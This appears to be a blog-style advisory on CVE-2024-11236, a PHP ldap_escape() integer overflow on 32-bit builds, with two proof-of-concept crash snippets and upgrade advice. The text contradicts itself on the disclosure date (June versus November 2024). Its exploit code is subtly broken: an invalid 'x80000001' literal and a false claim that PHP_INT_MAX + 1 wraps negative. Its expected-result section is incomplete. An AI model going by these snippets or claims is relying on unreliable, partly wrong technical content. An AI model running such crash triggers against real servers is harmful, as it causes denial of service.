CVE-2024-11236 - Breaking Down the LDAP Integer Overflow Vulnerability in PHP (with Exploit Example)

---

Introduction

In June 2024, a new PHP vulnerability—CVE-2024-11236—was made public. If you're running PHP 8.1 (before 8.1.31), 8.2 (before 8.2.26), or 8.3 (before 8.3.14), and especially if your system is 32-bit, this one's important. A subtle bug in the ldap_escape() function can let a malicious user trigger integer overflow and out-of-bounds write, paving the way to application crashes or, potentially, arbitrary code execution.

Let’s break down what happened, how it works, how you might exploit it, and what you should do.

What Is ldap_escape() Anyway?

In PHP, ldap_escape() is a function introduced in PHP 5.6 to safely prepare values for use in LDAP queries. It replaces or escapes control characters and sequences that could otherwise be interpreted as part of the LDAP query or cause errors.

Example

$input = "cn=John*Doe";
$safe = ldap_escape($input, "", LDAP_ESCAPE_FILTER);
// $safe is now: cn=John\2aDoe

The Vulnerability

On 32-bit PHP builds, if you call ldap_escape() with a really long string, an integer counter inside the function wraps around (overflows). This happens because PHP uses standard C integer types and, on 32-bit systems, values beyond 2,147,483,647 (2GB) will wrap to negative numbers. That can make memory-handling code in C do unpredictable things—including writing outside of the memory it's supposed to touch.

Exploitation in Practice

Let's walk through what a simple attack looks like.

PHP Code That Triggers the Bug

<?php
// This will work only on 32-bit systems with a vulnerable PHP version
// Creating a string of (PHP_INT_MAX + 1) length

$n = PHP_INT_MAX + 1; // This will wrap to a negative number on 32-bit
// Let's use str_repeat to build a long string, but watch out: PHP will crash if you go too far!

try {
    $str = str_repeat("A", $n);
    ldap_escape($str);
} catch (\Throwable $e) {
    echo "Caught exception: ", $e->getMessage();
}

Here’s a condensed example for a real 32-bit system with vulnerable PHP

<?php
// Only try this on a test VM—you could crash your whole PHP process!
$long = str_repeat("B", x80000001); // 2,147,483,649 bytes; overflows 32bit int
@ldap_escape($long);
echo "If you see this, you're not vulnerable (or on 64-bit).";
?>

Expected Result

- On patched/64-bit: Fatal error or exception.

Impact and Severity

- Who’s Affected? Anyone running PHP on a 32-bit system, especially if your web application accepts untrusted input and passes it to ldap_escape().

Attack Complexity: LOW. The attacker just needs to supply a super-long string as input.

- Possible Consequences: Denial of service, memory corruption, possibly remote code execution depending on platform and what data gets overwritten.

Patch references

- PHP upstream commit
- PHP changelog 8.1.31
- Debian Security Advisory

Upgrade PHP to a fixed version ASAP.

- If you can’t upgrade soon, restrict the length of inputs to ldap_escape(), especially if the value comes from a user.

References for Further Reading

- CVE Details for CVE-2024-11236
- PHP Manual - ldap_escape()
- GitHub PHP Source Analysis

Closing Notes

Memory bugs like CVE-2024-11236 are rare in high-level PHP—and even less common on 64-bit servers. But for legacy or embedded 32-bit systems, this bug is a show-stopper. Update PHP, limit dangerous inputs, and keep an eye on your logs. If you discover a crash after a weirdly long input, this could be why.

Timeline

Published on: 11/24/2024 01:15:04 UTC
Last modified on: 11/26/2024 18:29:05 UTC